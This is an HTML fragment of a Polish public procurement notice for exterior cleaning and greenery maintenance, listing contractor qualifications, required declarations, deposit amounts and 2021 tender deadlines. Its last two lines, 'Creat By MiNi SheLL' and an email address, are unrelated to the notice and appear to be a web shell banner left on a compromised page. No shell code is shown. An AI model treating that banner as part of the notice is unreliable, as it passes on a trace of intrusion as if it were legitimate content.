zdolność zawodowa - Wykonawca spełni warunek jeżeli wykaże, że wykonał w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 2 usługi, w tym:<br/>-	jedna polegająca na wykonaniu zewnętrznych prac porządkowo-czystościowych o wartości co najmniej 50 000,00 złotych;<br/>-	druga polegająca na pielęgnacji zieleni o wartości co najmniej 50 000,00 złotych<br/><br/>b)	zdolność techniczna <br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował następującym wyposażeniem w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami:<br/>1)	ciągnik wraz z kosiarką bijakową - w ilości minimum 2 szt.,<br/>2)	kosy spalinowe - w ilości minimum 6 szt.,<br/>3)	pilarki spalinowe - w ilości minimum 2 szt.,<br/>4) środki transportowe do wywozu traw i odpadów - minimalna ilość 4 szt., (w tym: jeden pojazd <br/> o ładowności od 5 t do 15 t i trzy pojazdy (dostawcze) o ładowności od 700 kg do 3,5 t) *,<br/>5)	urządzeniem zabezpieczenia ruchu drogowego - tablica zamykająca „U-26a” ze strzałą 22” lampową halogenową lub LED: wolnostojącą lub na pojazdy i przyczepy 1szt.<br/>Wszystkie pojazdy muszą spełniać normę emisji spalin co najmniej EURO 5.<br/>O ile z obowiązujących przepisów prawa wynikać będzie obowiązek wykonywania umowy z wykorzystaniem pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym, Wykonawca zapewni, aby ich udział we flocie pojazdów użytkowanych przy wykonywaniu tego zadania wynosił co najmniej 10%, chyba, że z przepisów wynikać będzie większy udział procentowy.<br/>c)	kwalifikacje zawodowe i uprawnienia osób skierowanych przez Wykonawcę do realizacji zamówienia Wykonawca spełni warunek jeżeli wykaże, że dysponuje co najmniej 10 osobami, w tym:<br/>-	dwie osoby o wykształceniu ogrodniczym lub pokrewnym z min 3-letnim stażem pracy przy pracach związanych z pielęgnacją drzew, karczowaniem zagajników i zakładaniem trawników (w usługach ogrodniczych) i innymi czynnościami wskazanymi w opisie przedmiotu zamówienia, <br/>-	dwie osoby posiadające uprawnienia do kierowania ruchem drogowym dla osób wykonujących roboty przy drodze, <br/>-	jeden pracownik z ukończonym kursem, szkoleniem lub szkołą w zakresie stosowania środków ochrony roślin, <br/>-	dwie osoby z uprawnieniami pilarza, <br/>-	trzech pracowników fizycznych.<br/>Uwaga! <br/>Jeżeli Wykonawca składa ofertę zarówno na Część 1 i Część 2 to do oferty załącza:<br/>-	wykaz usług – oddzielnie dla każdej Części (w dwóch wykazach Zamawiający wymaga wskazania czterech różnych usług) - każda o wartości co najmniej 50 000,00 złotych wg zapisu w pkt 3.3. lit. A <br/>ppkt a oraz w pkt 3.3 lit. B ppkt a;<br/>-	wykaz sprzętu - oddzielnie dla każdej Części zgodnie z zapisem w pkt 3.3 lit. A ppkt b<br/>-	wykaz osób – oddzielnie dla każdej Części t. j. <br/>-	wykonawca musi dysponować 10 osobami dla Części 1 zgodnie z zapisem w pkt 3.3 lit. A ppkt c <br/>-	oraz kolejnymi 10 osobami dla Części 2 zgodnie z zapisem w pkt 3.3. lit. B ppkt c <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania (według wzoru stanowiącego Załącznik Nr 3 do SWZ);<br/>2.	Oświadczenie (Załącznik Nr 8 do SWZ) Wykonawcy o niezaleganiu z opłacaniem podatków i opłat wobec urzędu skarbowego, a w przypadku zalegania z opłacaniem podatków lub opłat, wykonawca składa Oświadczenie wraz z dokumentami potwierdzającymi, że przed upływem terminu składania ofert, wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>3.	Oświadczenie (Załącznik Nr 8 do SWZ) Wykonawcy o niezaleganiu z opłacaniem składek na ubezpieczenie społeczne i zdrowotne wobec ZUS lub KRUS, a w przypadku zalegania z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne wykonawca składa Oświadczenie wraz z dokumentami potwierdzającymi, że przed terminem składania ofert dokonał płatności należnych składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>4.	Oświadczenie (Załącznik nr 8 do SWZ) Wykonawcy o:<br/>-	braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;<br/>-	braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;<br/>-	niezaleganiu w opłacaniu podatków i opłat lokalnych, o których mowa w ustawie o podatkach i opłatach lokalnych (tj. Dz. U. z 2019r. poz. 1170 z późn. zm.); <br/>5.	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu przepisów ustawy o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - Załącznik Nr 11 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu (według wzoru stanowiącego Załącznik Nr 4 do SWZ);<br/>2.	Wykaz usług (Załącznik Nr 5 do SWZ) wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Zamawiający zastrzega sobie prawo do weryfikacji potwierdzających dokumentów.<br/>3. Wykazu sprzętu - wyposażenie zakładu (Załącznik Nr 6 do SWZ) dostępnego wykonawcy <br/>w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.<br/>4.	Wykaz osób (Załącznik Nr 7 do SWZ), skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie <br/>do dysponowania tymi osobami.<br/>5.	Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100.000,00 złotych (sto tysięcy złotych 00/100). <br/>UWAGA!<br/>W przypadku złożenia ofert na 2 części minimalną kwotę ubezpieczenia od odpowiedzialności cywilnej należy zsumować (minimalna kwota powinna wynosić wtedy 200.000,00 zł ).<br/>6. Oświadczenie w zakresie wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub 14 RODO – (Załącznik Nr 9 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	W przypadku dokonywania czynności związanych ze złożeniem wymaganych dokumentów przez osobę(y) (podpisującą ofertę w imieniu Wykonawcy ubiegającego się o udzielenie zamówienia, ustanowioną do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego) nie wymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy lub jeżeli umocowanie nie wynika z przepisów prawa lub innych złożonych dokumentów, Zamawiający wymaga złożenia (wraz z Ofertą) oryginału Pełnomocnictwa w formie dokumentu elektronicznego opatrzonego podpisem elektronicznym osoby (lub osób) uprawnionej do udzielania pełnomocnictwa.<br/>2. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) – Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu <br/>o udzielenie zamówienia albo reprezentowaniu i zawarciu umowy w sprawie zamówienia. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich Wykonawców wspólnie ubiegających się o zamówienie zgodnie z zasadami ich reprezentacji. Pełnomocnictwo winno być złożone w oryginale w formie dokumentu elektronicznego opatrzonego podpisem elektronicznym;<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ustawy Pzp wraz z Ofertą składa:<br/>a)	Zobowiązanie Podmiotu udostępniającego zasoby (Załącznik Nr 10 do SWZ),<br/>b)	Oświadczenie (Załącznik Nr 8 do SWZ) Podmiotu o niezaleganiu z opłacaniem podatków i opłat wobec urzędu skarbowego, a w przypadku zalegania z opłacaniem podatków lub opłat, Podmiot składa Oświadczenie wraz z dokumentami potwierdzającymi, że przed upływem terminu składania ofert, Podmiot dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>c)	Oświadczenie (Załącznik Nr 8 do SWZ) Podmiotu o niezaleganiu z opłacaniem składek na ubezpieczenie społeczne i zdrowotne wobec ZUS lub KRUS, a w przypadku zalegania z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne Podmiot składa Oświadczenie wraz z dokumentami potwierdzającymi, że przed terminem składania ofert dokonał płatności należnych składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>d)	Oświadczenie (Załącznik nr 8 do SWZ) Podmiotu o:<br/>-	braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;<br/>-	braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;<br/>-	niezaleganiu w opłacaniu podatków i opłat lokalnych, o których mowa w ustawie o podatkach i opłatach lokalnych (tj. Dz. U. z 2019r. poz. 1170 z późn. zm.). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium w kwocie:<br/>1)	dla Części 1 - w wysokości 12.000,00 zł, <br/>2)	dla Części 2 - w wysokości 12.000,00 zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z zapisami SWZ Rozdział 20 pkt 3. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dla Części 1 zgodnie z zapisami w Załączniku Nr 1B do SWZ (projekt umowy) wg § 12 umowy.<br/><br/>Dla Części 2 zgodnie z zapisami w Załączniku Nr 2B do SWZ (projekt umowy) wg § 12 umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/zzm</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-30 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com